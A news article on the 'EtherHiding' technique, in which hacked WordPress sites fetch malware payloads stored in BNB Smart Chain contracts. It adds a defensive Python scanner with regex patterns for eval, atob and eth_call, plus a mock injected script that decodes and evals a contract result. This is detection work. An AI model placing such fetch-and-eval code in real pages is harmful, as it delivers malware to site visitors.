A recent cybersecurity report reveals a novel technique in which cybercriminals exploit BNB Smart Chain (BSC) smart contracts to camouflage and disseminate malware. Dubbed "EtherHiding," this new method raises concerns about the vulnerability of blockchain-based systems.
Guardio Labs, a cybersecurity research firm, detailed the workings of EtherHiding in an October 15th report. The technique involves compromising WordPress websites, which comprise approximately 43% of all existing websites.
Cybercriminals inject code into these websites to extract partial payloads from BSC smart contracts, effectively turning these contracts into anonymous hosting platforms for malicious content.
Nati Tal, head of cybersecurity at Guardio Labs, and researcher Oleg Zaytsev pointed out the tough challenge this poses for mitigation.
According to them, the attackers can easily alter the attack methods and code in real time. One of the most recent adaptations of this strategy involves fake browser updates, where victims are lured to fraudulent landing pages. These fake updates contain JavaScript that fetches supplementary code from the attackers' domains, eventually leading to full site destruction and malware distribution.
The autonomous nature of the compromised smart contracts adds an additional layer of complexity. Once these contracts are live on BSC, Binance has limited options and must rely on its developer community to identify and flag any malicious code.
Guardio Labs emphasizes the need for WordPress website owners to enhance their security measures, as their platforms can serve as initial entry points for these types of threats.
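For site owners, one way to triage rendered pages for the injection pattern described above is to flag inline scripts that both read from a blockchain and execute decoded strings. This is an added example, not code from the Guardio Labs report; the hint names, regexes and sample pages are assumptions constructed for illustration.

```python
import re

# Heuristic indicators chosen for this example (assumptions, not from the report):
# an inline script that reads from a blockchain AND executes decoded strings.
CHAIN_HINTS = {
    "eth_call": re.compile(r"\beth_call\b"),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "web3_client": re.compile(r"\bnew\s+Web3\b|\bethers\.\w*Provider\b"),
}
EXEC_HINTS = {
    "eval": re.compile(r"\beval\s*\("),
    "function_ctor": re.compile(r"\bnew\s+Function\s*\("),
    "atob": re.compile(r"\batob\s*\("),
}
INLINE_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)


def scan_page(html):
    """Return one finding per inline <script> that matches both hint groups."""
    findings = []
    for index, match in enumerate(INLINE_SCRIPT.finditer(html)):
        body = match.group(1)
        chain = sorted(n for n, rx in CHAIN_HINTS.items() if rx.search(body))
        execs = sorted(n for n, rx in EXEC_HINTS.items() if rx.search(body))
        if chain and execs:  # either group alone is common on legitimate sites
            findings.append({"script_index": index, "chain": chain, "exec": execs})
    return findings


# Constructed, non-functional sample pages (RPC_URL and the zero address are placeholders).
INJECTED_PAGE = """<html><head>
<script>window.dataLayer = window.dataLayer || [];</script>
<script>
fetch(RPC_URL, {method: "POST", body: JSON.stringify({method: "eth_call",
  params: [{to: "0x0000000000000000000000000000000000000000"}, "latest"]})})
  .then(r => r.json()).then(j => eval(atob(j.result)));
</script></head><body>Blog</body></html>"""
WALLET_PAGE = """<script>const p = new ethers.BrowserProvider(window.ethereum);
p.send("eth_call", [{to: "0x0000000000000000000000000000000000000000"}, "latest"]);</script>"""
LEGACY_PAGE = "<script>eval(config.expr);</script>"

if __name__ == "__main__":
    for name, page in [("injected", INJECTED_PAGE), ("wallet", WALLET_PAGE),
                       ("legacy", LEGACY_PAGE)]:
        print(name, scan_page(page))
```

The check only sees inline scripts in the HTML it is given; scripts loaded through `src` attributes have to be fetched and scanned separately, and a hit is a lead for manual review rather than proof of compromise.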
In their conclusion, the researchers from Guardio Labs warned that the capabilities of Web3 and blockchain technology could potentially enable harmful campaigns to operate without detection:
Adaptive defenses are needed to counter these emerging threats.
The discovery of the EtherHiding technique marks a significant evolution in cybercrime tactics using blockchain technology to spread malware. The issue poses a risk for WordPress website owners and presents a broader challenge to blockchain security measures.